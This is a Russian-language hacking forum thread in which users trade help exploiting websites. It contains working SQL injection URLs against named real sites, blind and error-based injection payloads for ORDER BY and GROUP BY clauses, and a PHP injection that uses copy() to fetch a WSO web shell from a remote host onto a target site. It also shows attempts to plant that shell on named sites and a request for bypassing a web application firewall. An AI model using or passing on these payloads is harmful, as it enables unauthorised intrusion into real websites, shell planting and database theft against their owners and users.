Ваши вопросы по уязвимостям.

13717, что это за число, и как оно находится? объясните или дайте ссылку почитать

 

никак, заместо 13717 может быть любое число

 

не любое, например

http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=403%20UNION%20SELECT%2013719,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,%2017,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20,34,35,36,37,38,39,40,41,42,43%20limit%201,1--+1

такой вариант не проходит и почему пятизначное?

 

количесто знаков тут не причём))
збоку где вывод выводятся баннеры, каждая ссылка имеет свой id, наведи и увидишь, к примеру 9580

вот если есть баннеры под определённым id - есть вывод, если нету то и вывода нету

 

Разобрался, например и так выводится

http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=-403+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,9580,35,36,37,38,39,40,41,42,43--+

 

ниужели никто не знает мой вопрос? я думал тут профи сидят

 

есть такая ссылка типа http://xxx.com/index.php?a=xxx&b=xxx
в переменные A и B можно запихнуть javascript код и он выполняется. как дальше можно раскрутить эту уязвимость(кроме пассивной xss)

 

PHP inj

site.com/recipe/rss/${@copy('http://site.ru/wso2_pack.txt', 'wso2_pack.php')}

Выдает: Account unavailable

1. В чем ошибка?
2. Где будет расположен шелл?
3. Где можно почитать информацию?

П.с.:

- http://site.ru/wso2_pack.txt - залит шел переименовал в txt;
- wso2_pack.php - путь до самого шелла.

Благодарю.

 

Я не разбираюсь, но мне кажется надо указать полный путь.

 

Не обязательно. Если хочешь шелл в текущую папку залить, где скрипт выполняется, то надо в его случае:

PHP:

copy('http://site.ru/wso2_pack.txt', './wso2_pack.php');

 

Если нет запуска процесса, то не выйдет.

 

Есть иньекция вида:

Code:

SELECT * FROM `data` WHERE name = 'test' ORDER BY id {SQL-INJ}

Пробую делать так:

Code:

SELECT * FROM `data` WHERE name = 'test' ORDER BY id+group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1+--+1

Но получаю:
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1+--+1' at line 1



А если делать union select

Code:

SELECT * FROM `date` WHERE name = 'test' ORDER BY id union select 1

то получаю:
#1221 - Incorrect usage of UNION and ORDER BY

Как сделать правильно? Или после конструкции ORDER нельзя уже ничего сделать?

 

Есть сайт который периодически спонтанно выдает такие ошибки:

Однако морковка (havij) так и не докапалась до бд. Скажите, эти ошибки существенны? и что можно сделать в этом случае.
иногда появляется на странице по адресу типа http://site.su/index.php?cat=x

 

Инъекция в ORDER BY.
Такие инжекты крутите, как блайнд:

Code:

SELECT * FROM `data` WHERE name = 'test' ORDER BY id AND IF(SUBSTR(VERSION(),1,1)=5,SLEEP(5),0)

 

ex'pert
SQLmap или руками.

 

Дополню ответ, который дал UXOR(может кому будет полезно):

Для эксплуатации инъекций применяется слепой метод:
Бинарный поиск всем знаком. Для того, чтобы вытащить 1 символ, нам необходимо послать 8 запросов.

Code:

SELECT if(ascii(substr(version(),1,1))<54,1,-1);

Но недавно предложили более быстрый способ эксплуатации таких инъекций, при котором 1 символ можно вывести за один запрос. Смотрим статью NameSpase Инъекция в ORDER BY: Второе дыхание

Code:

ORDER BY if(id < 10, if(id=1,1,(
            if(
                ascii(mid(user(),1,1)) & pow (2, (id-2)) > 0, 
                    # pow - возведение 2 в степень для получения необходимого числа:
                    #     2^0 = 1 = 00000001
                    #    2^1 = 2 = 00000010
                    #    2^2 = 4 = 00000100
                    # Так-же для этих целий можно использовать побитовый сдвиг
                    #    он и короче, но символы < и > могут фильтроваться
                    #        (Выше они используются для упрощения)
                    # 1 << 4 = 16         # (SELECT 4) >> (SELECT 1) = 2
                id, -id
        ))), 1000) LIMIT 9;

Так, что есть пища для размышления.

 

Нашёл, вроде как скулю, но что-то есть сомнения..

Code:

http://www.maxgame.com.ua/index.php?route=product/product&path=76'&product_id=852

 

UXOR, YaBtr, Вы что-то не то советуете.

Code:

ORDER BY id[COLOR=DarkOrange]|(SELECT 1 from information_schema.tables group by concat([COLOR=Red](SELECT version())[/COLOR],floor(rand(0)*2)) having min(0))[/COLOR]

Если бы инъекция была в GROUP BY, то тогда так:

Code:

GROUP BY id [COLOR=DarkOrange]is null, concat([COLOR=Red](SELECT version())[/COLOR],floor(rand(0)*2)) having min(0)[/COLOR]

Unknowhacker, там нет инъекции.

 

Можно пример? А т залиться не получается...да и с багами такими первый раз судьбу связал)
http://blogs.simplefit.ru/recipe/rss/

 

Привет всем!

Как обойти фильтрацию incapsula при SQL-инъекции?
Спасибо.